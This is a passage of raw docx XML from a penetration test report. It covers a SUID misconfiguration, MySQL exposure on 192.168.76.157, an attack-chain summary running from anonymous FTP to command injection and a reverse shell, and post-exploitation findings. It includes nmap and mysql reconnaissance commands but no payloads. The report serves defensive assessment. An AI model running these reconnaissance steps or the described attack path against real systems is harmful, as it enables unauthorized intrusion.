      <w:r>
        <w:t>This is rated as a High-risk misconfiguration because the underlying permission weakness (world-writable + SUID + non-root owner) is a well-understood and generally exploitable pattern; however, because exploitation was not demonstrated in this engagement, it is kept below the confirmed Critical/High findings that were fully proven (F-02, F-03). It should be prioritized for remediation and re-tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406373F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D824760" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remove the SUID bit from this binary unless there is a specific, documented, and reviewed business need for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F8FF66" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Ensure the file is not writable by any user other than its legitimate owner (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to remove group/other write access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AB781" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Audit the host for any other SUID/SGID binaries with non-default or overly permissive ownership/permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490ECCB2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>If SUID functionality is required, replace the binary with a narrowly scoped wrapper that performs strict input validation and drops privileges as early as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF93D1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-08 — MySQL Network Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516699E2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>LOW/MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-284 (Improper Access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t>Control) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve"> network exposure only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A4E96" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.76.157:3306 (MySQL) and :33060 (MySQL X Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A15C861" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4FCB0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The MySQL database service and its X Protocol listener are reachable from the attacker's network position. A direct connection attempt was rejected by the server's host-based access control, and no unauthorized database access was achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EE8C4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704498B8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap service detection confirms both ports open: 3306/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (MySQL, reported as "unauthorized") and 33060/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (MySQL X protocol listener) — see Figure 8 in Section 6 / Figure 1 (Section 5, F-01 area) for the underlying port scan evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3ABCE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A direct MySQL connection attempt from the attacker host returned an access-control rejection consistent with MySQL's host-based grant restrictions (the attacker host is not an authorized client for the configured account), and no database contents were accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02B31D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E18A1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm port state via service scan: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 3306,33060 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.76.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223C211" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attempt a direct client connection (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -h 192.168.76.157 -u root) and observe the host-based access rejection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D8B71C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F551BD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Network exposure of a database service increases the overall attack surface and could be leveraged if valid, network-permitted credentials were later obtained (e.g., through credential reuse or further host compromise), but no such access was demonstrated in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224D8BB7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5B879" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rated Low/Medium: exposure is confirmed, but the service's own access controls prevented the connection attempts made during this test, and no database compromise occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2B2A4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C1402" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Restrict MySQL network access using host firewall rules (e.g., bind to localhost or an internal management </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>network only</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) unless remote database access is a genuine operational requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41186B64" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply the principle of least privilege to MySQL account host-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>grants, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avoid overly permissive wildcard host entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCACEC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Monitor and alert on connection attempts to the database service from unexpected source addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2D286" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Attack Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B30AA9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The diagram below summarizes the confirmed exploitation path from initial reconnaissance through to the level of access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually achieved</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (www-data). Privilege escalation was investigated separately and was not successfully demonstrated; no arrow is drawn to root/defender access, consistent with the evidence gathered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ACE724" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Confirmed Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2BF95C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Anonymous FTP access (F-01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A41D9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ webpass.txt disclosure — application-specific credential fragment identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518CEC63" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Web application enumeration (directory brute-forcing, source review)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655618A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">↓ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BC13A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Hidden Base64-encoded "?path=" clue discovered in HTML comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70809C98" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ OS Command Injection confirmed (F-03)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11045AD9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Remote Code Execution as www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1DF266" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Reverse shell established (F-04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE91C67" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Local enumeration as www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3843F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Application source code disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18251CDC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Hardcoded credentials discovered and confirmed (F-02)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0F1B2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Admin/Profile page reached with valid credentials — also found reachable unauthenticated (F-05)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D52856" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>↓ Additional application weaknesses identified: Reflected XSS (F-06), MySQL exposure (F-08)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00792996" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Privilege Escalation (Investigated — Not Achieved)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D17C3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Local enumeration performed as www-data: process list, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration, home directory and file permission review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C57D7E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A world-writable SUID binary was discovered at /home/defender/Downloads</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (F-07).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C0E0F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution attempts against the binary did not elevate privileges — the resulting shell identity remained </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746433A2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>No further escalation technique (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hijacking, credential reuse, kernel exploit, etc.) yielded elevated access during this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DB40E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Final confirmed access level: www-data. Root or "defender" account access was NOT obtained or demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65914DA2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Post-Exploitation Findings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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64CEA" w14:paraId="064D3D17" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="125C23CF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73D67B83" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Confirmed Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="14B9023E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C2D4F6E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Current Access Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="514D1204" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>www-data (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=33)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="662A7372" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
